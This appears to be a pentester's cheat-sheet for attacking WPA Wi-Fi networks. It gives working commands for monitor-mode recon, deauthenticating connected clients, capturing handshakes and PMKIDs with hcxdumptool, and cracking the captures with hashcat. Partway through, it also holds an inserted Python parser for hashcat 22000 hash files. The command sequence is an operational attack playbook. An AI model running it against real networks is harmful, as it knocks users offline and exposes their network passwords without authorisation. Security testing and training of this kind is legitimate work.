Wireless

Tools

  • Aircrack - Main tool for recon and grabbing handshakes

  • Hcxdumptool - Main tool for obtaining PMKID and EAPOL M1M2M3 or EAPOL M1M2M3M4 auth

  • Hcxtools - Used to convert .cap, .pcap, and .pcapng files into a hashcat-readable format.

  • Hashcat - For cracking hashes


Handshake/PMKID

Aircrack

Verify the interface wlan0 is up and ready

iwconfig

Put interface into monitor mode

sudo airmon-ng start wlan0

Start scanning and performing recon, taking note of:

  • The channel #. This is needed if there is only one AP on a single channel. If there are multiple APs on different channels, this is not needed.

  • The AUTH section. PSK (pre-shared key) means we can obtain a handshake for offline cracking. MGT means it is configured for WPA-Enterprise.

  • The Stations below, to see if any clients are connected to our target. This may not show 100% of the connected clients.

sudo airodump-ng wlan0mon

*For 5GHz networks

sudo airodump-ng wlan1mon -b a

*For all networks (2.5GHz and 5GHz) - Note this can take longer as it sniffs multiple bands.

sudo airodump-ng wlan1mon -b abg

Focus on the target ESSID(s) and save to a file (be sure to add the band with -b if sniffing on 5GHz or both)

sudo airodump-ng wlan0mon -c CH# --essid "SSID" -w outfile

Obtain handshake - either wait for someone to connect to the AP from their device OR force a deauth. Using a second terminal window/tab, to deauth anything from the network:

sudo aireplay-ng -0 10 -a BSSID wlan0mon

If we choose a client to deauth it will be the same but with the client MAC(station)

sudo aireplay-ng -0 10 -a BSSID -c STATION wlan0mon

We can see if a handshake was obtained by checking the top right of our airodump screen.

Once we have our handshake, we can stop airodump with ctrl+c.


HCXDumptool

This may depend on which version you have installed. E.g. v6.2.9 has a different interface than v6.3.0+. I'll be going with the most up to date (currently v6.3.5).

This attack is not guaranteed! Not all access points (APs) are vulnerable to the PMKID attack, BUT this can still get us EAPOL M1M2M3 or EAPOL M1M2M3M4 auths.

Legend

  • R = + AP display : AP is in TX range or under attack

  • 1 = + AP display : got EAPOL M1 (CHALLENGE)

  • 3 = + AP display : got EAPOL M1M2M3 or EAPOL M1M2M3M4 (AUTHORIZATION) - hashcat / JtR can work on

  • P = + AP display : got PMKID - hashcat / JtR can work on

  • S = + AP display : AUTHENTICATION KEY MANAGEMENT PSK


  • E = + CLIENT display : got EAP-START MESSAGE

  • 2 = + CLIENT display : got EAPOL M1M2 (ROGUE CHALLENGE) - hashcat / JtR can work on

Scan for PMKID

Put interface into monitor mode

sudo airmon-ng start wlan0

Find the BSSID of our target with some recon using airodump

sudo airodump-ng wlan0mon

Once we have the BSSID, put it into a Berkeley Packet Filter (BPF) .bpf file.

tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID -ddd > SSID.bpf

OR

hcxdumptool --bpfc="wlan addr3 BSSID" > SSID.bpf

** NOTE: We can attack multiple APs with:

tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID or wlan addr3 BSSID2 -ddd > SSID.bpf

OR

hcxdumptool --bpfc="wlan addr3 BSSID1 or wlan addr3 BSSID2" > SSID.bpf

Then run hcxdumptool with the filter file and write the capture to a .pcapng:

sudo hcxdumptool --rds=1 -F --bpf=SSID.bpf -i wlan0mon -w outfile.pcapng

After a while we may see the + under the 3 or P of our target. Both of these can be used to obtain the password with hashcat. (Unable to get a PMKID in the demo environment sadly.)

When we see the + under the 3 or P of our target, stop hcxdumptool with ctrl+c.


Crack it with hashcat

Convert the file to the hashcat format. The output will look the same regardless of which file extension the input has.

  • .cap file conversion to hashcat format

sudo hcxpcapngtool -o SSIDHash outfile.cap

  • .pcapng file conversion to hashcat format

sudo hcxpcapngtool -o SSIDHash outfile.pcapng
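As an added example (not part of these notes, nor code from the hcxtools or hashcat projects), a small Python parser for the 22000 lines hcxpcapngtool writes: it reports whether each line is a PMKID or an EAPOL handshake, which message pair an EAPOL line holds (the same challenge vs. authorized distinction as the 2 and 3 columns in the hcxdumptool legend), and which ESSIDs, APs and clients appear, which is what you need to inventory what a capture exposed. The sample hash file contents are constructed placeholders.

```python
from collections import Counter
from dataclasses import dataclass

# Constructed sample of an hcxpcapngtool output file. All MACs, PMKID/MIC,
# nonce and EAPOL bytes are made-up placeholders, not from a real capture.
_ESSID_HEX = "436f7270576946692d4775657374"  # hex of "CorpWiFi-Guest"
SAMPLE_HASHFILE = "\n".join([
    "WPA*01*" + "ab" * 16 + "*0011223344aa*66778899bbcc*" + _ESSID_HEX + "***",
    "WPA*02*" + "cd" * 16 + "*0011223344aa*66778899bbcc*" + _ESSID_HEX
    + "*" + "1a" * 32 + "*0103007502010a00*03",
    "WPA*02*" + "ef" * 16 + "*0011223344aa*deadbeef0001*" + _ESSID_HEX
    + "*" + "2b" * 32 + "*0103007502010a00*80",
    "not a 22000 line",
])

# Message-pair codes in the low three bits of the last field (hashcat hccapx doc).
MESSAGE_PAIRS = {0: "M1M2 (challenge)", 1: "M1M4", 2: "M2M3 (EAPOL from M2)",
                 3: "M2M3 (EAPOL from M3)", 4: "M3M4 (EAPOL from M3)",
                 5: "M3M4 (EAPOL from M4)"}

@dataclass
class Entry:
    kind: str            # "PMKID" or "EAPOL"
    mac_ap: str
    mac_client: str
    essid: str
    message_pair: str    # "" for PMKID lines
    authorized: bool     # False only for an M1M2 challenge (rogue/AP-less style)
    replay_checked: bool # False when bit 7 is set: replay counter not checked

def parse_line(line: str):
    """Parse one WPA*01 / WPA*02 line; return None for anything else."""
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] not in ("01", "02"):
        return None
    essid = bytes.fromhex(f[5]).decode("utf-8", errors="replace")
    if f[1] == "01":
        return Entry("PMKID", f[3], f[4], essid, "", True, True)
    mp = int(f[8], 16)
    pair = MESSAGE_PAIRS.get(mp & 0x07, f"unknown({mp & 0x07})")
    return Entry("EAPOL", f[3], f[4], essid, pair, (mp & 0x07) != 0, not (mp & 0x80))

def summarize(text: str) -> dict:
    """Count PMKID/EAPOL lines per ESSID and list the APs and clients seen."""
    entries = [e for e in map(parse_line, text.splitlines()) if e]
    return {"entries": entries,
            "per_essid": dict(Counter((e.essid, e.kind) for e in entries)),
            "aps": sorted({e.mac_ap for e in entries}),
            "clients": sorted({e.mac_client for e in entries})}
```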

Use hashcat with mode 22000 and a wordlist. Try different wordlists and rules.

sudo hashcat -m 22000 SSIDHash wordlist

We can also run the above command with --show to print any password already cracked and stored in the potfile.

sudo hashcat -m 22000 SSIDHash wordlist --show

Captive Portals

COMING SOON
